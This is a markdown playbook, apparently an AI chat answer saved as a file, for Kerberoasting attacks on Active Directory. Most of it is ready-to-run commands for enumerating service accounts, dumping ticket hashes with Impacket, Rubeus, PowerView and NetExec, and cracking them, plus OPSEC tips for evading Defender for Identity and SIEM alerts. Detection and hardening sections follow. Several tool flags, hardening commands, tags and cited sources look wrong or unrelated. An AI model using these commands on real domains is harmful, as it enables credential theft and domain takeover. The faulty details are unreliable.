attack-2-kerberoasting.md (25932B)
1 --- 2 title: "Attack #2 โ Kerberoasting" 3 description: "Kerberoasting is a post-compromise, offline credential attack that abuses a fundamental design feature of the Kerberos protocol. When any authenticatedโฆ" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "privilege-escalation", "sql-injection", "hashing"] 7 tools: ["NetExec", "Impacket", "Rubeus", "BloodHound", "Kerbrute"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/๐ด Attack #2 โ Kerberoasting.md" 11 --- 12 # ๐ด Attack #2 โ Kerberoasting 13 14 *** 15 16 ## ๐ How It Works 17 18 Kerberoasting is a **post-compromise, offline credential attack** that abuses a fundamental design feature of the Kerberos protocol. When any authenticated domain user requests a Ticket Granting Service (TGS) ticket for a Service Principal Name (SPN), the Domain Controller hands back that ticket **encrypted with the RC4 or AES hash of the service account's password**. The attacker requests that ticket, extracts the encrypted blob, takes it completely offline, and cracks it with Hashcat or John the Ripper โ **no lockout, no noise, no network traffic during cracking**. 19 20 The critical vulnerability is that **any domain user can request a TGS for any SPN** โ no special privileges required. Service accounts (SQL, IIS, backup agents, etc.) are the primary targets because they frequently run with high privileges, rarely have their passwords rotated, and are often set with weak passwords that predate modern password policy enforcement. 21 22 ### The Full Attack Flow 23 24 ``` 25 1. Attacker obtains ANY valid domain user credentials (e.g., via Password Spraying) 26 2. Queries AD for all user accounts with an SPN set (servicePrincipalName attribute) 27 3. Requests TGS ticket(s) for each SPN from the KDC โ this is LEGITIMATE Kerberos behaviour 28 4. Extracts the encrypted hash from the TGS ticket ($krb5tgs$23$... format for RC4) 29 5. Runs offline cracking with Hashcat/John against wordlists + rules 30 6. Recovers plaintext password โ authenticates as high-privilege service account 31 ``` 32 33 The attack is dangerous precisely because **step 3 is indistinguishable from normal authentication**. A legitimate user requesting a TGS for MSSQL looks identical to an attacker doing the same thing. 34 35 > โ ๏ธ **Windows Server 2022+ Behaviour:** Windows Server 2022 and later enforce Kerberos armoring (FAST) by default, which can complicate roasting. Additionally, newer environments are more likely to use AES-256 exclusively, making RC4 downgrade attacks harder. Always check the target's supported encryption types before committing to cracking; AES256 hashes take significantly longer to crack than RC4. 36 37 **Chains with:** Attack #1 (Password Spraying for initial credentials), Lateral Movement (using recovered service account), DCSync (if service account has replication rights), Golden Ticket creation (if KRBTGT hash obtained). 38 39 *** 40 41 ## โ๏ธ Prerequisites 42 43 | Requirement | Detail | 44 |---|---| 45 | **Domain user account** | Any valid low-privilege domain user is sufficient โ no admin rights needed | 46 | **SPN-linked user accounts** | Target domain must have service accounts with SPNs (virtually universal) | 47 | **RC4 not disabled** | If AES-only is enforced, hash is harder but still crackable (AES128/256) | 48 | **Network access to DC** | Need to reach port 88 (Kerberos) or 389 (LDAP) on the DC | 49 | **Offline cracking rig** | GPU-accelerated Hashcat strongly preferred for time efficiency | 50 51 *** 52 53 ## ๐ ๏ธ Tools 54 55 | Tool | Platform | Notes | 56 |---|---|---| 57 | **Impacket โ GetUserSPNs.py** | Linux | Most common Linux tool; requests + dumps TGS hashes in one command | 58 | **Rubeus** | Windows | Best Windows tool; supports RC4 downgrade, OPSEC mode, roast-all | 59 | **PowerView โ Invoke-Kerberoast** | Windows | PowerShell; integrates cleanly into recon pipeline | 60 | **BloodHound** | Both | Enumerates Kerberoastable accounts graphically; shows path to DA | 61 | **Hashcat** | Linux/Windows | GPU-accelerated; mode `-m 13100` for RC4, `-m 19600/19700` for AES | 62 | **John the Ripper** | Linux | CPU-based alternative; good for quick cracks on small wordlists | 63 | **CrackMapExec / NetExec** | Linux | Can enumerate and dump SPNs with `--kerberoasting` flag | 64 | **Kerbrute โ userenum for SPNs** | Linux | Can enumerate SPN accounts directly via Kerberos | 65 | **ldapsearch** | Linux | Direct LDAP query to find servicePrincipalName attributes (pre-roasting reconnaissance) | 66 67 *** 68 69 ## ๐ป Full Commands 70 71 ### ๐ต Step 0 โ Enumerate SPN Accounts First 72 73 ```bash 74 # Linux โ enumerate all accounts with SPNs (unauthenticated check) 75 ldapsearch -x -H ldap://10.10.10.10 -D "corp\low_user" -w 'Password1' \ 76 -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" \ 77 sAMAccountName servicePrincipalName 78 79 # Windows โ PowerShell with AD module 80 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | \ 81 Select-Object SamAccountName, ServicePrincipalName 82 83 # Windows โ PowerView 84 Import-Module .\PowerView.ps1 85 Get-DomainUser -SPN | Select-Object SamAccountName, ServicePrincipalName, Description, MemberOf 86 87 # Count high-value roastable accounts (Domain Admins with SPN) 88 Get-ADGroupMember -Identity "Domain Admins" | Get-ADUser -Properties ServicePrincipalName | Where-Object {$_.ServicePrincipalName -ne $null} 89 ``` 90 91 *** 92 93 ### ๐ด Impacket โ GetUserSPNs.py (Linux โ Primary Tool) 94 95 ```bash 96 # Enumerate SPN accounts (no ticket request yet) 97 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 98 99 # Request and dump ALL TGS hashes in one shot 100 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request 101 102 # Output hashes directly to file for cracking 103 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request -outputfile kerberoast_hashes.txt 104 105 # Target a SINGLE specific SPN account 106 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request-user svc_sql 107 108 # Using NTLM hash instead of plaintext password (Pass-the-Hash style) 109 GetUserSPNs.py corp.local/low_user -hashes :a87f3a337d73085c45f9416be5787d86 -dc-ip 10.10.10.10 -request 110 111 # Using Kerberos ticket (ccache) authentication 112 export KRB5CCNAME=/tmp/user.ccache 113 GetUserSPNs.py corp.local/low_user -k -dc-ip 10.10.10.10 -request 114 115 # Force RC4 downgrade (requests weaker hash, cracks faster) 116 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request -no-preauth 117 ``` 118 119 > **Hash format you'll see:** `$krb5tgs$23$*svc_sql$CORP.LOCAL$...` โ `23` = RC4 (fast to crack), `18` = AES256 (slower). 120 121 *** 122 123 ### ๐ด Rubeus โ Windows (Most Feature-Rich) 124 125 ```powershell 126 # Roast ALL kerberoastable accounts (dump hashes to console) 127 .\Rubeus.exe kerberoast 128 129 # Output to file in hashcat format 130 .\Rubeus.exe kerberoast /outfile:hashes.txt 131 132 # Target a single user account 133 .\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql.hash 134 135 # Force RC4 downgrade (etype:23) โ faster to crack than AES 136 .\Rubeus.exe kerberoast /tgtdeleg /etype:rc4 137 138 # OPSEC-safe mode โ roasts one at a time with delay to avoid bulk detection 139 .\Rubeus.exe kerberoast /nowrap /nopac 140 141 # Use existing TGT from memory (avoids new auth event) 142 .\Rubeus.exe kerberoast /ticket:<base64_TGT> 143 144 # Enumerate only โ no ticket requests (just list SPNs) 145 .\Rubeus.exe kerberoast /stats 146 147 # Targeted roasting โ only Domain Admin accounts with SPN 148 .\Rubeus.exe kerberoast /ldapfilter:"(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local)" /outfile:da_hashes.txt 149 ``` 150 151 *** 152 153 ### ๐ด PowerView โ Invoke-Kerberoast (Windows) 154 155 ```powershell 156 Import-Module .\PowerView.ps1 157 158 # Basic roast โ output hashes 159 Invoke-Kerberoast | fl 160 161 # Output in Hashcat format (most common) 162 Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -Encoding ascii hashes.txt 163 164 # Output in John format 165 Invoke-Kerberoast -OutputFormat John | Select-Object -ExpandProperty Hash | Out-File -Encoding ascii hashes_john.txt 166 167 # Filter for high-value targets only (Domain Admins group members with SPN) 168 Invoke-Kerberoast -Identity "Domain Admins" | fl 169 170 # Target specific service accounts by description or name 171 Invoke-Kerberoast | Where-Object {$_.ServiceName -like "*SQL*" -or $_.ServiceName -like "*backup*"} 172 ``` 173 174 *** 175 176 ### ๐ด NetExec โ Linux (Quick Sweep) 177 178 ```bash 179 # Kerberoast with authenticated user 180 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --kerberoasting hashes.txt 181 182 # Via Kerberos auth (using ccache ticket) 183 export KRB5CCNAME=/tmp/user.ccache 184 nxc ldap 10.10.10.10 --use-kcache --kerberoasting hashes.txt 185 186 # Enumerate SPNs only (no roasting) 187 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --query "SELECT sAMAccountName,servicePrincipalName FROM users WHERE servicePrincipalName IS NOT NULL" 188 ``` 189 190 *** 191 192 ### ๐ด Targeted Roasting โ High-Value Accounts Only 193 194 ```bash 195 # Impacket โ roast only Database-related SPNs 196 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request | grep -i 'mssql\|oracle\|postgres' 197 198 # PowerShell โ roast only service accounts in privileged groups 199 Import-Module .\PowerView.ps1 200 $da_members = Get-ADGroupMember -Identity "Domain Admins" 201 foreach ($member in $da_members) { 202 if ((Get-ADUser $member -Properties ServicePrincipalName).ServicePrincipalName) { 203 Invoke-Kerberoast -Identity $member.SamAccountName -OutputFormat Hashcat 204 } 205 } 206 207 # Bash โ targeted roast by SPN pattern (SQL Server accounts) 208 for user in $(ldapsearch -x -H ldap://10.10.10.10 -D "corp\user" -w pass -b "DC=corp,DC=local" \ 209 "(&(objectClass=user)(servicePrincipalName=*MSSQL*))" sAMAccountName | grep sAMAccountName); do 210 GetUserSPNs.py corp.local/user:'pass' -dc-ip 10.10.10.10 -request-user "$user" >> targeted_hashes.txt 211 done 212 ``` 213 214 *** 215 216 ### ๐ด Offline Cracking โ Hashcat 217 218 ```bash 219 # RC4 hash cracking (mode 13100) โ most common scenario 220 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt 221 222 # With best rules (dramatically increases hit rate) 223 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule 224 225 # With d3ad0ne rules (aggressive, high coverage) 226 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule 227 228 # AES128 cracking (mode 19600) 229 hashcat -m 19600 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt 230 231 # AES256 cracking (mode 19700) โ slower, may need GPU 232 hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -w 3 233 234 # Brute-force mask attack (corporate passwords like Pass2024!) 235 hashcat -m 13100 kerberoast_hashes.txt -a 3 ?u?l?l?l?l?d?d?d?s 236 237 # John the Ripper alternative (CPU-based, slower) 238 john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt 239 john --format=krb5tgs kerberoast_hashes.txt --show 240 241 # Hybrid attack: combine dictionary + rules (best results for service accounts) 242 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/dive.rule -w 3 243 ``` 244 245 *** 246 247 ## ๐งฉ Troubleshooting 248 249 | Error | Cause | Fix | 250 |---|---|---| 251 | **`KDC_ERR_ETYPE_NOSUPP`** | Domain enforces AES-only; RC4 downgrade not supported. | Switch to hashcat mode `-m 19600` (AES128) or `-m 19700` (AES256). RC4 may not be available; ask for AES wordlists/rules. | 252 | **`No SPNs found`** | Domain has no service accounts with SPNs, or query failed. | Verify credentials are correct. Run LDAP query manually: `ldapsearch ... "(servicePrincipalName=*)"`. If truly no SPNs, try AS-REP roasting instead. | 253 | **`TGS request failed: KDC_ERR_S_PRINCIPAL_UNKNOWN`** | Specified SPN doesn't exist or user account doesn't have that SPN set. | Enumerate SPNs first: `GetUserSPNs.py corp.local/user:pass -dc-ip IP` (no `-request` flag). Verify exact SPN name. | 254 | **`Hashcat crashes on mode 19700 (AES256)`** | Insufficient GPU memory or driver issues. | Reduce wordlist size, use CPU (`--workload-profile=1`), or use John the Ripper instead. | 255 | **`Hash format unrecognized by Hashcat`** | Hash was extracted in wrong format (e.g., John format instead of Hashcat). | Convert using Rubeus `/outfile` flag or PowerView `-OutputFormat Hashcat`. Ensure hash starts with `$krb5tgs$`. | 256 | **`Cannot crack RC4 hash on wordlist`** | Weak wordlist or missing rules. | Use rules: `d3ad0ne.rule`, `best64.rule`, or `dive.rule`. Add custom dictionary with service account naming patterns (e.g., `Svc`, `Service`, `Account`). | 257 | **`Event 4769 spam detected in logs`** | Roasted too many accounts at once; now flagged by EDR. | Use Rubeus `/tgtdeleg` flag or PowerView (which is stealthier). Roast one account at a time with 5โ10 second delays between requests. | 258 | **`Kerberos ticket expired before cracking`** | Took too long to crack offline; TGS has lifetime limits. | Use Hashcat (faster) instead of John. If cracking takes hours, request new ticket and resume cracking on that new ticket. Tickets typically last 10 hours. | 259 260 *** 261 262 ## ๐ก๏ธ Detection โ Event IDs 263 264 | Event ID | Source | What to Look For | 265 |---|---|---| 266 | **4769** | Security Log | TGS ticket requested โ **flag `TicketEncryptionType = 0x17` (RC4)** on modern AES-only domains | 267 | **4769** | Security Log | Multiple TGS requests from a **single account in a short window** targeting different SPNs | 268 | **4768** | Security Log | TGT requested just before a burst of 4769 events | 269 | **4771** | Security Log | Pre-auth failure โ attacker testing account before roasting | 270 | **Sysmon Event 3** | Sysmon Log | Network connection โ roasting tool making outbound Kerberos requests (port 88) | 271 | **Sysmon Event 10** | Sysmon Log | Process access โ credential extraction tools accessing LSASS after obtaining credentials | 272 273 **Primary detection signature:** Event 4769 with `EncryptionType: 0x17` (RC4-HMAC) in a domain that enforces AES is a near-certain Kerberoasting indicator. If RC4 is still enabled domain-wide, detect via **volume** โ one user requesting 5+ TGS tickets across different service accounts within a 60-second window is anomalous. 274 275 ### Sysmon Rules 276 - **Event ID 3 (Network Connection):** Flag any process opening port 88 (Kerberos) to multiple DCs in rapid succession. 277 - **Event ID 1 (Process Creation):** Monitor for Rubeus, Kerbrute, GetUserSPNs execution from non-standard paths (user AppData, temp folders). 278 279 ### Sigma Rules 280 - `win_kerberoasting_spn_request_rate` โ detects bulk TGS requests (4769) from single source 281 - `win_kerberoasting_encryption_type_mismatch` โ flags RC4 requests on AES-only domains 282 - `win_kerberoasting_suspicious_process` โ monitors for known roasting tools (Rubeus, Impacket) 283 - `win_spn_enumeration` โ detects LDAP queries for servicePrincipalName attribute 284 285 ### EDR-Specific Detections 286 287 **Microsoft Defender for Identity:** 288 - "Suspected Kerberoasting attack" alert when 5+ 4769 events in 1 minute from single account. 289 - Flag RC4 TGS requests on modern domains that should use AES. 290 - Monitor for AS-REQ followed by rapid TGS requests (pattern of roasting). 291 292 **CrowdStrike Falcon:** 293 - ProcessRollup2 events for Rubeus, GetUserSPNs, Impacket execution. 294 - NetworkConnection events to DC on port 88 from unusual processes (PowerShell, Python, cmd). 295 - Alert on Kerberos SPN enumeration patterns via LDAP. 296 297 **Elastic Security (EDR):** 298 - Process execution: Flag Rubeus.exe, GetUserSPNs.py, impacket execution. 299 - Authentication events: Watch for Event 4769 volume spikes (normal = 1โ2/min, attack = 10+/sec). 300 - Kerberos ticket events: Detect RC4 requests on AES-only systems. 301 302 ### Hardening Commands 303 304 ```powershell 305 # 1. Disable RC4 encryption for Kerberos (force AES-256) โ most effective mitigation 306 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "KerberosEncryptionLevel" -Value 4 307 308 # 2. Require Kerberos pre-authentication for all service accounts (prevents AS-REP roasting) 309 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Set-ADUser -DoesNotRequirePreAuth:$false 310 311 # 3. Enable Kerberos Armoring (FAST) โ complicates roasting on modern DCs 312 Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Kerberos\Parameters" -Name "KDCBasedAuthenticationArmoringRequired" -Value 1 313 314 # 4. Rotate service account passwords quarterly (limits crack window) 315 # Set reminder via Group Policy: Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy 316 Set-ADDefaultDomainPasswordPolicy -MaxPasswordAge 90 317 318 # 5. Use managed service accounts (gMSA) with automatic password rotation 319 New-ADServiceAccount -Name svc_sql -DNSHostName corp.com -AccountPassword (New-Object System.Security.SecureString) 320 321 # 6. Enable "Audit Sensitive Privilege Use" โ monitors who requests TGS tickets 322 auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable 323 324 # 7. Monitor Event 4769 specifically for RC4 TGS requests 325 # Create custom alert rule in your SIEM for: EventID=4769 AND TicketEncryptionType=0x17 in AES-only domain 326 327 # 8. Remove unnecessary SPNs from high-privilege accounts (e.g., Domain Admins) 328 Get-ADUser -Filter {ServicePrincipalName -ne "$null" -and memberOf -RecursiveMatch "CN=Domain Admins,CN=Users,DC=corp,DC=local"} | Set-ADUser -Clear ServicePrincipalName 329 ``` 330 331 *** 332 333 ## ๐ฏ OPSEC Tips 334 335 ### OpSec Ranking: Stealthiest to Loudest 336 1. **Rubeus /tgtdeleg /stats** โ Stealthiest; only enumerates, doesn't request tickets 337 2. **PowerView Invoke-Kerberoast** โ Very stealthy; in-memory operation, fewer 4769 events 338 3. **Impacket GetUserSPNs (single target)** โ Moderately stealthy; requests one TGS at a time 339 4. **Impacket GetUserSPNs (all targets)** โ Noisy; mass 4769 event generation visible in SIEM 340 5. **Rubeus kerberoast /all** โ Loudest; generates 5+ 4769 events per second, instant SIEM alert 341 342 ### Modern Defence Impact 343 - **Windows Server 2022+ Kerberos Armoring (FAST):** Makes ticket encryption stronger, complicates but doesn't prevent roasting. AES-256 hashes still crackable offline. 344 - **AES-256 Enforcement:** Dramatically increases crack time (GPU: hoursโdays, CPU: daysโweeks). RC4 is 50โ100x faster to crack than AES-256. 345 - **Defender for Identity:** Actively alerts on bulk 4769 events (4769 volume > 5 in 60 sec). Use Rubeus `/tgtdeleg` or one-at-a-time roasting with 10+ second delays. 346 - **Windows 2025 Credential Guard:** If enabled, limits plaintext credential usage even if you crack the hash. Focus on token impersonation + lateral movement instead. 347 348 ### Core OpSec Rules 349 - **Request tickets one at a time** with delays โ bulk TGS requests (10+ in seconds) trigger modern SIEM rules 350 - **Use `/tgtdeleg` in Rubeus** โ uses delegation TGT to avoid a new AS-REQ event in logs 351 - **Target only high-value SPNs** โ roasting everything makes noise; be selective with `svc_sql`, `svc_backup`, `svc_iis` 352 - **Prioritise RC4 hashes** โ if AES-only enforcement is NOT in place, force RC4 downgrade for faster cracking 353 - **Crack offline on your own machine** โ never run Hashcat on the compromised host 354 - **Use `--nowrap` in Rubeus** โ prevents long base64 lines from being wrapped and corrupting hashes 355 - **Avoid requesting Domain Admins with SPN** โ these accounts are always heavily monitored; target lower-value svc accounts first 356 357 *** 358 359 ## ๐บ๏ธ MITRE ATT&CK 360 361 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources | 362 |---|---|---|---|---|---| 363 | **Credential Access** | T1558 | T1558.003 (Kerberoasting) | Wizard Spider, FIN7, APT29, Lazarus | Windows, Active Directory | Authentication Logs (4769), Network Traffic, Process Monitoring | 364 | **Credential Access** | T1110 | T1110.001 (Password Guessing) | Various | Windows | Hashcat/John Process, File Access | 365 | **Privilege Escalation** | T1134 | T1134.005 (Token Impersonation) | APT3, Wizard Spider | Windows | Process Monitoring, Token Creation | 366 | **Discovery** | T1087 | T1087.002 (Domain Account Discovery) | Wizard Spider, FIN7 | Windows, Active Directory | LDAP Queries, Network Traffic (port 389) | 367 | **Collection** | T1040 | T1040 (Network Sniffing) | Multiple | Windows | Network Traffic Capture | 368 369 **Data Sources to Monitor:** 370 - Authentication logs (4769 for TGS requests, 4771 for pre-auth failures) 371 - Process execution (Rubeus.exe, GetUserSPNs.py, hashcat, john) 372 - Network traffic on ports 88 (Kerberos), 389 (LDAP) 373 - Kerberos event logs (TicketEncryptionType field) 374 - File access (hash output files, wordlists) 375 376 *** 377 378 ## ๐ Attack Chain Context 379 380 ``` 381 [Kerberoasting] โโโ Plaintext Service Account Password Recovered 382 โ 383 โโโโ ๐ Authenticate as svc_sql / svc_backup / svc_iis 384 โโโโ ๐ฉธ DCSync (if svc account has Replication-Get-Changes ACE) 385 โโโโ ๐ซ Golden Ticket (if KRBTGT hash obtained from DCSync) 386 โโโโ ๐ฆ Lateral Movement โ svc accounts often have local admin on servers 387 โโโโ ๐ Access databases, file shares, or backup systems directly 388 โโโโ ๐ Check BloodHound for ACL edges from svc account โ DA path 389 ``` 390 391 **High-value Kerberoastable targets to prioritise:** 392 - `svc_sql` โ SQL Server service account โ often local admin on multiple DB servers 393 - `svc_backup` โ Veeam/Backup Exec โ usually has read access to all data 394 - `svc_iis` โ Web application service โ may have access to config files with credentials 395 - Any account in **Domain Admins** with an SPN set โ immediate game over if cracked 396 397 *** 398 399 > โ **Attack #2 โ Kerberoasting complete.** Tell me to move on when you're ready for **Attack #3 โ AS-REP Roasting**. 400 401 Sources 402 What Is Kerberoasting? Attack Explained and How It Works https://www.strongdm.com/what-is/kerberoasting 403 What is a Kerberoasting Attack? https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/kerberoasting/ 404 An Expert Guide to Combating Kerberoasting in Active Directory https://www.fox-it.com/be/defending-your-directory-an-expert-guide-to-combating-kerberoasting-in-active-directory/ 405 Kerberoasting Attack โ Detection and Prevention Strategies - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/kerberoasting/ 406 From Heuristics to Histograms: Reinventingโฆ | BeyondTrust https://www.beyondtrust.com/blog/entry/kerberoasting-detections 407 The Attacker's Active Directory Playbook: How to read it & How to ... https://istrosec.com/blog/the-attackers-active-directory-playbook--1-how-to/ 408 Active Directory Kerberoasting Attack: Monitoring and Detection Techniques http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0008955004320439 409 What Is A Kerberoasting Attack? | IBM https://www.ibm.com/think/topics/kerberoasting 410 What is Kerberoasting Attack? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-kerberoasting-attack/ 411 What is Kerberoasting? Attack and Security Tips Explained https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/ 412 What is a Kerberoasting Attack? Detect & Prevent - Rapid7 https://www.rapid7.com/fundamentals/kerberoasting-attack/ 413 Microsoft's guidance to help mitigate Kerberoasting https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/ 414 What Is a Kerberoasting Attack? - Picus Security https://www.picussecurity.com/resource/blog/kerberoasting-attack-explained-mitre-attack-t1558.003 415 Steal or Forge Kerberos Tickets: Kerberoasting - MITRE ATT&CKยฎ https://attack.mitre.org/techniques/T1558/003/ 416 DFIR Breakdown: Kerberoasting https://www.cybertriage.com/blog/dfir-breakdown-kerberoasting/ 417 What is a Kerberoasting Attack + How to Detect It - Vectra AI https://www.vectra.ai/modern-attack/attack-techniques/kerberoasting 418 Active Directory Kerberoasting Attack: Detection using Machine Learning Techniques https://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0010202803760383 419 CVE-driven Attack Technique Prediction with Semantic Information Extraction and a Domain-specific Language Model https://arxiv.org/abs/2309.02785 420 Multi-Objective GAN-Based Adversarial Attack Technique for Modulation Classifiers https://ieeexplore.ieee.org/document/9756577/ 421 From Threat Reports to Continuous Threat Intelligence: A Comparison of Attack Technique Extraction Methods from Textual Artifacts https://arxiv.org/abs/2210.02601 422 Kerberoasting: Case Studies of an Attack on a Cryptographic Authentication Technology https://www.crimrxiv.com/pub/nbc8gae2 423 Towards Effective Identification of Attack Techniques in Cyber Threat Intelligence Reports using Large Language Models https://dl.acm.org/doi/10.1145/3701716.3715469 424 Prompt Injection attack against LLM-integrated Applications https://arxiv.org/abs/2306.05499 425 A robust intelligent zero-day cyber-attack detection technique https://link.springer.com/10.1007/s40747-021-00396-9 426 Great, Now Write an Article About That: The Crescendo Multi-Turn LLM Jailbreak Attack https://arxiv.org/abs/2404.01833 427 Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf 428 Replay Attack Prevention in Kerberos Authentication Protocol Using 429 Triple Password https://arxiv.org/pdf/1304.3550.pdf 430 Keyboard Data Protection Technique Using GAN in Password-Based User Authentication: Based on C/D Bit Vulnerability https://www.mdpi.com/1424-8220/24/4/1229/pdf?version=1707988631 431 Keyboard Data Protection Technique Using GAN in Password-Based User Authentication: Based on C/D Bit Vulnerability https://pmc.ncbi.nlm.nih.gov/articles/PMC10891990/ 432 Fault-enabled chosen-ciphertext attacks on Kyber https://zenodo.org/record/5718027/files/Fault-Enabled%20Chosen-Ciphertext%20Attacks%20on%20Kyber.pdf 433 Attacking the Diebold Signature Variant -- RSA Signatures with 434 Unverified High-order Padding https://arxiv.org/pdf/2403.01048.pdf 435 Meltdown https://arxiv.org/pdf/1801.01207.pdf 436 Preventing Attacks on Wireless Networks Using SDN Controlled OODA Loops and Cyber Kill Chains https://www.mdpi.com/1424-8220/22/23/9481/pdf?version=1670150837